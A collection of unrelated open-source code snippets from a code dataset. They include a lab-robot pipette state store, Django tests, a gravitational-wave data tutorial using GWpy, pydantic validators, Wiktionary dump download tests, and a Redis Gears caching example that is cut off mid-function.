'my_resource_types.csv'
)
},
'contributors.role': {
'path': os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'my_contributor_roles.csv'
)
}
}
"""
RDM_RECORDS_UI_EDIT_URL = "/uploads/<pid_value>"
"""Default UI URL for the edit page of a Bibliographic Record."""
#: Default site URL (used only when not in a context - e.g. like celery tasks).
THEME_SITEURL = "http://localhost:5000"
PREVIEWER_RECORD_FILE_FACOTRY = previewer_record_file_factory
|
StarcoderdataPython
|
133611
|
"""Basic pipette data state and store."""
from dataclasses import dataclass
from typing import Dict, List, Mapping, Optional, Tuple
from typing_extensions import final
from opentrons_shared_data.pipette.dev_types import PipetteName
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.types import MountType, Mount as HwMount
from .. import command_models as cmd, errors
from .substore import Substore, CommandReactive
@final
@dataclass(frozen=True)
class PipetteData:
"""Pipette state data."""
mount: MountType
pipette_name: PipetteName
@final
@dataclass(frozen=True)
class HardwarePipette:
"""Hardware pipette data."""
mount: HwMount
config: PipetteDict
class PipetteState:
"""Basic labware data state and getter methods."""
_pipettes_by_id: Dict[str, PipetteData]
def __init__(self) -> None:
"""Initialize a PipetteState instance."""
self._pipettes_by_id = {}
def get_pipette_data_by_id(self, pipette_id: str) -> PipetteData:
"""Get pipette data by the pipette's unique identifier."""
try:
return self._pipettes_by_id[pipette_id]
except KeyError:
raise errors.PipetteDoesNotExistError(
f"Pipette {pipette_id} not found."
)
def get_all_pipettes(self) -> List[Tuple[str, PipetteData]]:
"""Get a list of all pipette entries in state."""
return [entry for entry in self._pipettes_by_id.items()]
def get_pipette_data_by_mount(
self,
mount: MountType
) -> Optional[PipetteData]:
"""Get pipette data by the pipette's mount."""
for pipette in self._pipettes_by_id.values():
if pipette.mount == mount:
return pipette
return None
def get_hardware_pipette(
self,
pipette_id: str,
attached_pipettes: Mapping[HwMount, Optional[PipetteDict]],
) -> HardwarePipette:
"""Get a pipette's hardware configuration and state by ID."""
pipette_data = self.get_pipette_data_by_id(pipette_id)
pipette_name = pipette_data.pipette_name
mount = pipette_data.mount
hw_mount = mount.to_hw_mount()
hw_config = attached_pipettes[hw_mount]
if hw_config is None:
raise errors.PipetteNotAttachedError(f"No pipetted attached on {mount}")
# TODO(mc, 2020-11-12): support hw_pipette.act_as
elif hw_config["name"] != pipette_name:
raise errors.PipetteNotAttachedError(
f"Found {hw_config['name']} on {mount}, "
f"but {pipette_id} is a {pipette_name}"
)
return HardwarePipette(mount=hw_mount, config=hw_config)
class PipetteStore(Substore[PipetteState], CommandReactive):
"""Pipette state container."""
_state: PipetteState
def __init__(self) -> None:
"""Initialize a PipetteStore and its state."""
self._state = PipetteState()
def handle_completed_command(
self,
command: cmd.CompletedCommandType
) -> None:
"""Modify state in reaction to a completed command."""
if isinstance(command.result, cmd.LoadPipetteResult):
pipette_id = command.result.pipetteId
self._state._pipettes_by_id[pipette_id] = PipetteData(
pipette_name=command.request.pipetteName,
mount=command.request.mount
)
|
StarcoderdataPython
|
3219640
|
import pytoml as toml
def get_cfg(path):
# read config file
with open(path, "r") as f:
cfg = toml.load(f)
return cfg
def flit_metadata(cfg):
return cfg.get("tool").get("flit").get("metadata")
def snakeye_metadata(cfg):
return cfg.get("tool").get("snakeye").get("metadata")
def get_dependencies(cfg):
return cfg.get("tool").get("snakeye").get("dependencies")
def set_dependencies(cfg, deps):
cfg["tool"]["snakeye"]["dependencies"] = deps
return cfg
def display_deps(flit, snakeye, deps):
print("{} {} {}".format(flit["module"], snakeye["pkg_version"], snakeye["description"]))
print()
print("Dependencies: ")
length = len(deps)
i = 1
for dep, version in deps.items():
if i == 1:
print("├── {} {}".format(dep, version))
elif i == length:
print("└── {} {}".format(dep, version))
else:
print("├── {} {}".format(dep, version))
i += 1
|
StarcoderdataPython
|
4829689
|
<gh_stars>1-10
def test():
# Here we can either check objects created in the solution code, or the
# string value of the solution, available as __solution__. A helper for
# printing formatted messages is available as __msg__. See the testTemplate
# in the meta.json for details.
# If an assertion fails, the message will be displayed
assert "rename" in __solution__ , "Are you using the 'rename' function?"
assert "assign" in __solution__ , "Are you using the 'assign' function?"
assert "capture_rate" in __solution__ , "Are you renaming 'capture_rt' to capture_rate?"
assert "AD_total" in __solution__ , "Are you creating a new column 'AD_total' by adding 'defense' and 'attack'?"
assert pokemon_plot.mark == 'circle', "Are you using the 'mark_circle()' function?"
assert pokemon_plot.encoding.x.shorthand == 'AD_total', "Make sure you are plotting 'AD_total' on the x-axis."
assert pokemon_plot.encoding.y.shorthand == 'capture_rate', "Make sure you are plotting 'capture_rate' on the y-axis."
__msg__.good("Nice work, well done!")
|
StarcoderdataPython
|
1685473
|
"""
A Python library for the chorus.fightthe.pw site.
This uses the website's API but transforms it into a Python-enviorment.
"""
from .pychorus import *
__all__ = [
"Song",
"search",
"latest",
"random",
"count",
"SongNotFoundError",
"PageNotFoundError"
]
__version__ = "0.023"
__author__ = "expliked"
|
StarcoderdataPython
|
4806274
|
<gh_stars>1-10
#!/usr/bin/env python
import fiona
import time
from rasterio.plot import show, show_hist
from projections.rasterset import RasterSet, Raster
import projections.predicts as predicts
import projections.modelr as modelr
# Open the mask shape file
shp_file = '../../data/from-adriana/tropicalforests.shp'
shapes = fiona.open(shp_file)
# Read Adriana's abundance model (mainland)
mod = modelr.load('../models/ab-corrected.rds')
predicts.predictify(mod)
# Import standard PREDICTS rasters
rasters = predicts.rasterset('1km', 'foo', 2005, 'historical')
rs = RasterSet(rasters, shapes = shapes, all_touched = True)
rs[mod.output] = mod
what = mod.output
stime = time.time()
data = rs.write(what, 'hires.tif')
etime = time.time()
print("executed in %6.2fs" % (etime - stime))
|
StarcoderdataPython
|
1767024
|
<filename>projects/manipulathor_baselines/armpointnav_baselines/experiments/ithor/armpointnav_disjoint_depth.py
import gym
import torch.nn as nn
from allenact_plugins.manipulathor_plugin.manipulathor_constants import ENV_ARGS
from allenact_plugins.manipulathor_plugin.manipulathor_task_samplers import (
ArmPointNavTaskSampler,
)
from projects.manipulathor_baselines.armpointnav_baselines.experiments.ithor.armpointnav_depth import (
ArmPointNavDepth,
)
from projects.manipulathor_baselines.armpointnav_baselines.models.disjoint_arm_pointnav_models import (
DisjointArmPointNavBaselineActorCritic,
)
class ArmPointNavDisjointDepth(ArmPointNavDepth):
"""An Object Navigation experiment configuration in iThor with RGB
input."""
TASK_SAMPLER = ArmPointNavTaskSampler
def __init__(self):
super().__init__()
assert (
self.CAMERA_WIDTH == 224
and self.CAMERA_HEIGHT == 224
and self.VISIBILITY_DISTANCE == 1
and self.STEP_SIZE == 0.25
)
self.ENV_ARGS = {**ENV_ARGS, "renderDepthImage": True}
@classmethod
def create_model(cls, **kwargs) -> nn.Module:
return DisjointArmPointNavBaselineActorCritic(
action_space=gym.spaces.Discrete(
len(cls.TASK_SAMPLER._TASK_TYPE.class_action_names())
),
observation_space=kwargs["sensor_preprocessor_graph"].observation_spaces,
hidden_size=512,
)
@classmethod
def tag(cls):
return cls.__name__
|
StarcoderdataPython
|
148711
|
import embedded_media as emb
from django.forms import Form, CharField, TextInput, Media
from django.test import TestCase
class EmbeddedMediaTest(TestCase):
def test_css(self):
## CSS rendering
css = emb.CSS('.mywidget { display: none; }')
self.assertHTMLEqual(css.render('all'),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
def test_js(self):
## JS rendering
js = emb.JS('init_mywidget();')
self.assertHTMLEqual(js.render(),
'<script type="text/javascript">init_mywidget();</script>')
def test_media(self):
## Embedded JavaScript and CSS
class MyWidget(TextInput):
class Media:
css = {'all': (emb.CSS('.mywidget { display: none; }'),)}
js = (emb.JS('init_mywidget();'),)
w = MyWidget()
self.assertHTMLEqual(str(w.media['css']),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
self.assertHTMLEqual(str(w.media['js']),
'<script type="text/javascript">init_mywidget();</script>')
def test_property(self):
## Embedded JavaScript and CSS as a media property
class MyWidget(TextInput):
def _media(self):
return Media(
css={'all': (emb.CSS('.mywidget { display: none; }'),)},
js=(emb.JS('init_mywidget();'),)
)
media = property(_media)
w = MyWidget()
self.assertHTMLEqual(str(w.media['css']),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
self.assertHTMLEqual(str(w.media['js']),
'<script type="text/javascript">init_mywidget();</script>')
def test_mutiple(self):
## Multiple instances of embedded media should only be rendered once
class MyWidget(TextInput):
def _media(self):
return Media(
css={'all': (emb.CSS('.mywidget { display: none; }'),)},
js=(emb.JS('init_mywidget();'),)
)
media = property(_media)
class MyForm(Form):
field1 = CharField(widget=MyWidget)
field2 = CharField(widget=MyWidget)
f = MyForm()
self.assertHTMLEqual(str(f.media), """
<style type="text/css" media="all">.mywidget { display: none; }</style>
<script type="text/javascript">init_mywidget();</script>
""")
|
StarcoderdataPython
|
1695736
|
<reponame>shenhuaze/leetcode-python<filename>code/word_search.py
"""
@author <NAME>
@date 2019-09-30
"""
def exist(board, word):
if board is None or len(board) == 0 or board[0] is None or len(board[0]) == 0:
return False
m = len(board)
n = len(board[0])
for i in range(m):
for j in range(n):
if search(board, i, j, m, n, word, 0):
return True
return False
def search(board, i, j, m, n, word, index):
if index == len(word):
return True
if i < 0 or j < 0 or i >= m or j >=n or board[i][j] == "#" or board[i][j] != word[index]:
return False
ch = board[i][j]
board[i][j] = "#"
result = (search(board, i - 1, j, m, n, word, index + 1) or
search(board, i + 1, j, m, n, word, index + 1) or
search(board, i, j - 1, m, n, word, index + 1) or
search(board, i, j + 1, m, n, word, index + 1))
board[i][j] = ch
return result
if __name__ == '__main__':
board_ = [
['A', 'B', 'C', 'E'],
['S', 'F', 'C', 'S'],
['A', 'D', 'E', 'E']
]
word_ = "ABCCED"
print(exist(board_, word_))
|
StarcoderdataPython
|
59936
|
from interactiongrader import Answer
from interactiongrader import ChangeType
from fuzzywuzzy import fuzz
def test_calculate_ranges():
ans = Answer()
ranges = ans.calculate_ranges()
assert ans.sentence == ''
assert ranges[ChangeType.FLIP] == 0.75
def test_random_change_type():
ans = Answer()
change = ans.random_change_type()
assert change in ChangeType
def test_misspell():
ans = Answer('Sample test')
misspelled = ans.misspell()
score = fuzz.ratio(misspelled, ans.sentence)
assert ans.sentence == 'Sample test'
assert ans.sentence != misspelled
assert score >= ans.minimum_fuzzy_score
def test_is_misspelling():
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
|
StarcoderdataPython
|
3324820
|
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# #### Tutorial 1.2: Introduction to GWpy
#
# This tutorial will briefly describe GWpy, a python package for gravitational astrophysics, and walk-through how you can use this to speed up access to, and processing of, GWOSC data.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2019/blob/master/Day_1/Tuto%201.2%20Open%20Data%20access%20with%20GWpy.ipynb)
#
# <div class="alert alert-info">This notebook were generated using python 3.7, but should work on python 2.7, 3.6, or 3.7.</div>
# ## Installation (execute only if running on a cloud platform or if you haven't done the installation already!)
#
# Note: we use [`pip`](https://docs.python.org/3.6/installing/), but **it is recommended** to use [conda](https://docs.ligo.org/lscsoft/conda/) on your own machine, as explained in the [installation instructions](https://github.com/gw-odw/odw-2019/blob/master/setup.md). This usage might look a little different than normal, simply because we want to do this directly from the notebook.
# In[2]:
# -- Uncomment following line if running in Google Colab
#! pip install -q 'gwpy==1.0.1'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ## Initialization
# In[1]:
import gwpy
print(gwpy.__version__)
# ## A note on object-oriented programming
#
# Before we dive too deeply, its worth a quick aside on object-oriented programming (OOP).
# GWpy is heavily object-oriented, meaning almost all of the code you run using GWpy is based around an object of some type, e.g. `TimeSeries`.
# Most of the methods (functions) we will use are attached to an object, rather than standing alone, meaning you should have a pretty good idea of what sort of data you are dealing with (without having to read the documentation!).
#
# For a quick overview of object-oriented programming in Python, see [this blog post by <NAME>](https://jeffknupp.com/blog/2014/06/18/improve-your-python-python-classes-and-object-oriented-programming/).
# ## Handling data in the time domain
# #### Finding open data
#
# We have seen already that the `gwosc` module can be used to query for what data are available on GWOSC.
# The next thing to do is to actually read some open data. Let's try to get some for GW150914, the first direct detection of an astrophysical gravitational-wave signal from a BBH (binary black hole system).
#
# We can use the [`TimeSeries.fetch_open_data`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.fetch_open_data) method to download data directly from https://www.gw-openscience.org, but we need to know the GPS times.
# We can query for the GPS time of an event as follows:
# In[2]:
from gwosc.datasets import event_gps
gps = event_gps('GW150914')
print(gps)
# Now we can build a `[start, end)` GPS segment to 10 seconds around this time, using integers for convenience:
# In[3]:
segment = (int(gps)-5, int(gps)+5)
print(segment)
# and can now query for the full data.
# For this example we choose to retrieve data for the LIGO-Livingston interferometer, using the identifier `'L1'`.
# We could have chosen any of
#
# - `'G1`' - GEO600
# - `'H1'` - LIGO-Hanford
# - `'L1'` - LIGO-Livingston
# - `'V1'` - (Advanced) Virgo
#
# In the future, the Japanese observatory KAGRA will come online, with the identifier `'K1'`.
# In[4]:
from gwpy.timeseries import TimeSeries
ldata = TimeSeries.fetch_open_data('L1', *segment, verbose=True)
print(ldata)
# ##### The `verbose=True` flag lets us see that GWpy has discovered two files that provides the data for the given interval, downloaded them, and loaded the data.
# The files are not stored permanently, so next time you do the same call, it will be downloaded again, however, if you know you might repeat the same call many times, you can use `cache=True` to store the file on your computer.
#
# Notes:
#
# * To read data from a local file instead of from the GWOSC server, we can use [`TimeSeries.read`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.read) method.
#
# We have now downloaded real LIGO data for GW150914! These are the actual data used in the analysis that discovered the first binary black hole merger.
# To sanity check things, we can easily make a plot, using the [`plot()`](https://gwpy.github.io/docs/stable/timeseries/plot.html) method of the `data` `TimeSeries`.
# <div class="alert alert-info">
# Since this is the first time we are plotting something in this notebook, we need to make configure `matplotlib` (the plotting library) to work within the notebook properly:
# </div>
# Matplotlib documentation can be found [`here`](https://matplotlib.org/contents.html).
# In[5]:
get_ipython().run_line_magic('matplotlib', 'inline')
plot = ldata.plot()
# Notes: There are alternatives ways to access the GWOSC data.
#
# * [`readligo`](https://losc.ligo.org/s/sample_code/readligo.py) is a light-weight Python module that returns the time series into a Numpy array.
# * The [PyCBC](http://github.com/ligo-cbc/pycbc) package has the `pycbc.frame.query_and_read_frame` and `pycbc.frame.read_frame` methods. We use [PyCBC](http://github.com/ligo-cbc/pycbc) in Tutorial 2.1, 2.2 and 2.3.
# ## Handling data in the frequency domain using the Fourier transform
#
# The [Fourier transform](https://en.wikipedia.org/wiki/Fourier_transform) is a widely-used mathematical tool to expose the frequency-domain content of a time-domain signal, meaning we can see which frequencies contian lots of power, and which have less.
#
# We can calculate the Fourier transform of our `TimeSeries` using the [`fft()`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.fft) method:
# In[6]:
fft = ldata.fft()
print(fft)
# The result is a [`FrequencySeries`](https://gwpy.github.io/docs/stable/frequencyseries/), with complex amplitude, representing the amplitude and phase of each frequency in our data.
# We can use `abs()` to extract the amplitude and plot that:
# In[7]:
plot = fft.abs().plot(xscale="log", yscale="log")
plot.show(warn=False)
# This doesn't look correct at all!
# The problem is that the FFT works under the assumption that our data are periodic, which means that the edges of our data look like discontinuities when transformed.
# We need to apply a window function to our time-domain data before transforming, which we can do using the [`scipy.signal`](https://docs.scipy.org/doc/scipy/reference/signal.html) module:
# In[8]:
from scipy.signal import get_window
window = get_window('hann', ldata.size)
lwin = ldata * window
# Let's try our transform again and see what we get
# In[9]:
fftamp = lwin.fft().abs()
plot = fftamp.plot(xscale="log", yscale="log")
plot.show(warn=False)
# This looks a little more like what we expect for the amplitude spectral density of a gravitational-wave detector.
# ## Calculating the power spectral density
#
# In practice, we typically use a large number of FFTs to estimate an averages power spectral density over a long period of data.
# We can do this using the [`asd()`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.asd) method, which uses [Welch's method](https://en.wikipedia.org/wiki/Welch%27s_method) to combine FFTs of overlapping, windowed chunks of data.
# In[10]:
asd = ldata.asd(fftlength=4, method="median")
plot = asd.plot()
plot.show(warn=False)
# In[11]:
ax = plot.gca()
ax.set_xlim(10, 1400)
ax.set_ylim(2e-24, 1e-20)
plot
# The ASD is a standard tool used to study the frequency-domain sensitivity of a gravitational-wave detector.
# For the LIGO-Livingston data we loaded, we can see large spikes at certain frequencies, including
#
# - ~300 Hz
# - ~500 Hz
# - ~1000 Hz
#
# The [O2 spectral lines](https://www.gw-openscience.org/o2speclines/) page on GWOSC describes a number of these spectral features for O2, with some of them being forced upon us, and some being deliberately introduced to help with interferometer control.
#
# Loading more data allows for more FFTs to be averaged during the ASD calculation, meaning random variations get averaged out, and we can see more detail:
# In[12]:
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
plot = lasd2.plot()
ax = plot.gca()
ax.set_xlim(10, 1400)
ax.set_ylim(5e-24, 1e-20)
plot.show(warn=False)
# Now we can see some more features, including sets of lines around ~30 Hz and ~65 Hz, and some more isolate lines through the more sensitive region.
#
# For comparison, we can load the LIGO-Hanford data and plot that as well:
# In[13]:
# get Hanford data
hdata2 = TimeSeries.fetch_open_data('H1', int(gps)-512, int(gps)+512, cache=True)
hasd2 = hdata2.asd(fftlength=4, method="median")
# and plot using standard colours
ax.plot(hasd2, label='LIGO-Hanford', color='gwpy:ligo-hanford')
# update the Livingston line to use standard colour, and have a label
lline = ax.lines[0]
lline.set_color('gwpy:ligo-livingston') # change colour of Livingston data
lline.set_label('LIGO-Livingston')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.legend()
plot
# Now we can see clearly the relative sensitivity of each LIGO instrument, the common features between both, and those unique to each observatory.
# # Challenges:
# ##### Quiz Question 1:
#
# The peak amplitude in the LIGO-Livingston data occurs at approximately 5 seconds into the plot above and is undetectable above the background noise by the eye. Plot the data for the LIGO-Hanford detector around GW150914. Looking at your new LIGO-Handford plot, can your eye identify a signal peak?
# In[14]:
from gwosc.datasets import event_gps
gps1 = event_gps('GW150914')
print(gps1)
segment1 = (int(gps)-7, int(gps)+7)
print(segment1)
from gwpy.timeseries import TimeSeries
ldata1 = TimeSeries.fetch_open_data('L1', *segment1, verbose=True)
print(ldata1)
get_ipython().run_line_magic('matplotlib', 'inline')
plot1 = ldata1.plot()
# In[24]:
import matplotlib.pyplot as plt
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
# get Hanford data
hdata2 = TimeSeries.fetch_open_data('H1', int(gps)-512, int(gps)+512, cache=True)
hasd2 = hdata2.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(hasd2, label='LIGO-Hanford', color='gwpy:ligo-hanford')
ax.plot(lasd2, label='LIGO-Livingston', color='gwpy:ligo-livingston')
ax.set_xlim(2, 1400)
ax.set_ylim(5e-24, 2e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# # Quiz Question 2 :
#
# Make an ASD around the time of an O3 event, GW190412 for L1 detector . Compare this with the ASDs around GW150914 for L1 detector. Which data have lower noise - and so are more sensitive - around 100 Hz?
#
# In[25]:
from gwosc.datasets import event_gps
gps_GW190412 = event_gps('GW190412')
print(gps_GW190412)
segment_GW190412 = (int(gps_GW190412)-7, int(gps_GW190412)+7)
print(segment_GW190412)
from gwpy.timeseries import TimeSeries
ldata_GW190412 = TimeSeries.fetch_open_data('L1', *segment_GW190412, verbose=True)
print(ldata_GW190412)
get_ipython().run_line_magic('matplotlib', 'inline')
plot_GW190412 = ldata_GW190412.plot()
# In[32]:
import matplotlib.pyplot as plt
ldata_GW190412 = TimeSeries.fetch_open_data('L1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
lasd_GW190412 = ldata_GW190412.asd(fftlength=4, method="median")
# get Hanford data
hdata_GW190412 = TimeSeries.fetch_open_data('H1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
hasd_GW190412 = hdata_GW190412.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(hasd_GW190412, label='LIGO-Hanford', color='gwpy:ligo-hanford')
ax.plot(lasd_GW190412, label='LIGO-Livingston', color='gwpy:ligo-livingston')
ax.set_xlim(2, 1400)
ax.set_ylim(4e-24, 7e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# In[33]:
import matplotlib.pyplot as plt
ldata_GW190412 = TimeSeries.fetch_open_data('L1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
lasd_GW190412 = ldata_GW190412.asd(fftlength=4, method="median")
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(lasd2, label='LIGO-L1-GW150914', color='blue')
ax.plot(lasd_GW190412, label='LIGO-L1-GW190412', color='green')
ax.set_xlim(2, 1400)
ax.set_ylim(4e-24, 7e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# # The GW190412 data has lesser noise around 100 Hz
# In[ ]:
|
StarcoderdataPython
|
197478
|
<reponame>AdamCottrill/FishNetPortal
from datetime import date
from typing import Optional
from pydantic import validator, constr
from .utils import to_titlecase, yr_to_year
from .FNBase import FNBase, prj_cd_regex
class FN011(FNBase):
"""parser/validator for FN011 objects:
+ Valid project code.
+ Year must be consistent with project code
+ slug is lowercase prj_cd
+ prj_date0 must be constistent with prj_cd
+ prj_date1 must be constistent with prj_cd and occur on or after prj_date0
"""
lake_id: int
protocol_id: int
prj_ldr_id: int
slug: str
prj_cd: constr(regex=prj_cd_regex)
year: int
prj_nm: str
prj_date0: date
prj_date1: date
comment0: Optional[str]
_prj_nm_titlecase = validator("prj_nm", allow_reuse=True)(to_titlecase)
@validator("year")
def check_year_with_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
if int(prj_cd_yr) != v:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year ({v}) is not consistent with prj_cd year ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
@validator("prj_date0")
@classmethod
def prj_date0_matches_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
date_yr = str(v.year)
if prj_cd_yr != date_yr:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year of start date (prj_date0={v}) is not consistent with prj_cd ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
@validator("prj_date1")
def prj_date0_before_prj_date1(cls, v, values):
if values.get("prj_date0") > v:
raise ValueError(
"Project end date (prj_date1) occurs before start date(prj_date0)."
)
return v
@validator("prj_date1")
@classmethod
def prj_date1_matches_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
date_yr = str(v.year)
if prj_cd_yr != date_yr:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year of end date (prj_date1={v}) is not consistent with prj_cd ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
|
StarcoderdataPython
|
3270414
|
from django.urls import include, path
from .views import DepartmentViewSet, PersonViewSet
from .routers import CustomDefaultRouter
router = CustomDefaultRouter()
router.register(r'department', DepartmentViewSet, basename='department')
router.register(r'people', PersonViewSet, basename='person')
urlpatterns = (
path('api/', include(router.urls)),
)
|
StarcoderdataPython
|
3394130
|
import os
from pathlib import Path
import responses
from wikidict import download
from wikidict.constants import BASE_URL, DUMP_URL
WIKTIONARY_INDEX = """<html>
<head><title>Index of /frwiktionary/</title></head>
<body bgcolor="white">
<h1>Index of /frwiktionary/</h1><hr><pre><a href="../">../</a>
<a href="20191120/">20191120/</a> 02-Jan-2020 01:29 -
<a href="20191201/">20191201/</a> 21-Jan-2020 01:36 -
<a href="20191220/">20191220/</a> 02-Feb-2020 01:28 -
<a href="20200101/">20200101/</a> 21-Feb-2020 01:38 -
<a href="20200120/">20200120/</a> 02-Mar-2020 01:28 -
<a href="20200201/">20200201/</a> 02-Apr-2020 01:36 -
<a href="20200220/">20200220/</a> 24-Feb-2020 17:32 -
<a href="20200301/">20200301/</a> 09-Mar-2020 03:42 -
<a href="{date}/">{date}/</a> 17-Apr-2020 15:20 -
<a href="latest/">latest/</a> 17-Apr-2020 15:20 -
</pre><hr></body>
</html>
"""
@responses.activate
def test_simple(craft_data):
"""It should download the Wiktionary dump file and extract it."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
date = "20200417"
pages_xml = output_dir / f"pages-{date}.xml"
pages_bz2 = output_dir / f"pages-{date}.xml.bz2"
# Clean-up before we start
for file in (pages_xml, pages_bz2):
file.unlink(missing_ok=True)
# List of requests responses to falsify:
# - fetch_snapshots()
# - fetch_pages()
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date=date),
)
responses.add(
responses.GET,
DUMP_URL.format("fr", date),
body=craft_data(date, "fr"),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert pages_xml.is_file()
assert pages_bz2.is_file()
@responses.activate
def test_download_already_done(craft_data):
"""It should not download again a processed Wiktionary dump."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
date = "20200417"
pages_xml = output_dir / f"pages-{date}.xml"
pages_bz2 = output_dir / f"pages-{date}.xml.bz2"
# The BZ2 file was already downloaded
pages_bz2.write_bytes(craft_data(date, "fr"))
# List of requests responses to falsify:
# - fetch_snapshots()
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date=date),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert pages_xml.is_file()
assert pages_bz2.is_file()
@responses.activate
def test_ongoing_dump(craft_data, capsys):
"""When the dump is not finished on the Wiktionary side, the previous dump should be used."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
# Clean-up before we start
for date in ("20200301", "20200514"):
(output_dir / f"pages-{date}.xml").unlink(missing_ok=True)
(output_dir / f"pages-{date}.xml.bz2").unlink(missing_ok=True)
# List of requests responses to falsify:
# - fetch_snapshots()
# - fetch_pages() for 20200514
# - fetch_pages() for 20200301
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date="20200514"),
)
responses.add(
responses.GET,
DUMP_URL.format("fr", "20200514"),
status=404,
)
responses.add(
responses.GET,
DUMP_URL.format("fr", "20200301"),
body=craft_data("20200301", "fr"),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert (output_dir / "pages-20200301.xml").is_file()
assert (output_dir / "pages-20200301.xml.bz2").is_file()
# Check that files are not created
assert not (output_dir / "pages-20200514.xml").is_file()
assert not (output_dir / "pages-20200514.xml.bz2").is_file()
def test_progress_callback_normal(capsys):
download.callback_progress("Some text: ", 42 * 1024, False)
captured = capsys.readouterr()
assert captured.out == "\rSome text: 43,008 bytes"
download.callback_progress("Some text: ", 42 * 1024, True)
captured = capsys.readouterr()
assert captured.out == "\rSome text: OK [43,008 bytes]\n"
def test_progress_callback_ci(capsys):
download.callback_progress_ci("Some text: ", 42 * 1024, False)
captured = capsys.readouterr()
assert captured.out == "."
download.callback_progress_ci("Some text: ", 42 * 1024, True)
captured = capsys.readouterr()
assert captured.out == ". OK [43,008 bytes]\n"
|
StarcoderdataPython
|
1770517
|
<filename>myo-sensor-data-analysis/Radar plots/real_time_refactored.py<gh_stars>0
import myo
class Listener(myo.DeviceListener):
def on_paired(self, event):
print("Hello, {}!".format(event.device_name))
event.device.vibrate(myo.VibrationType.short)
def on_unpaired(self, event):
return False # Stop the hub
def on_orientation(self, event):
orientation = event.orientation
acceleration = event.acceleration
gyroscope = event.gyroscope
# ... do something with that
def on_pose(self, pose):
pass
if __name__ == '__main__':
myo.init(sdk_path='/Users/harvinderpower/GitHub/ichealthhack18/myo-sensor-data-analysis/sdk/')
hub = myo.Hub()
listener = Listener()
while hub.run(listener.on_event, 500):
pass
|
StarcoderdataPython
|
93139
|
import datetime
import timeit
import redgrease
# Bind / register the function on some Redis instance.
r = redgrease.RedisGears()
# CommandReader Decorator
# The `command` decorator tunrs the function to a CommandReader,
# registerered on the Redis Gears sever if using the `on` argument
@redgrease.command(on=r, requirements=["requests"], replace=False)
def cache_get(url):
import requests
# Check if the url is already in the cache,
# And if so, simply return the cached result.
if redgrease.cmd.exists(url):
return bytes(redgrease.cmd.get(url))
# Otherwise fetch the url.
response = requests.get(url)
# Return nothing if request fails
if response.status_code != 200:
return bytes()
# If ok, set the cache data and return.
response_data = bytes(response.content)
